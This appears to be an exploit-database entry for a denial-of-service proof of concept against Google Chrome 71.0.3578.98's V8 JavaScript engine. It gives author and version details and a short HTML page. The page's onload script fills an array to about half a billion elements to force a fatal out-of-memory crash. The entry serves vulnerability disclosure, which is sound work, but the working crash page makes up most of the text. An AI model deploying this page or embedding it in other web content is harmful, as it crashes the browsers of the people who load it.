Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory in Invalid Array Length
2019-01-16 18:05:08<!--
# Exploit Title: Google Chrome 71.0.3578.98 V8 JavaScript Engine - Out-of-memory in invalid array length. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-01-10
# Exploit Author: Bogdan Kurinnoy ([email protected])
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 71.0.3578.98, V8 version 7.3.0 (candidate)
# Tested on: Windows x64
# CVE : N/A
# Description:
# Fatal javascript OOM in invalid array length
# https://bugs.chromium.org/p/v8/issues/detail?id=8668
-->
<html>
<head>
<script>
function main() {
var ar = [];
for(let i = 0; i < 0x20000000; ++i){
ar[i]=i;
}
}
</script>
</head>
<body onload=main()></body>
</html>
Fixes
No fixesIn order to submit a new fix you need to be registered.







 
	 
	 
	 
	 
	 
	 
	 
	 
	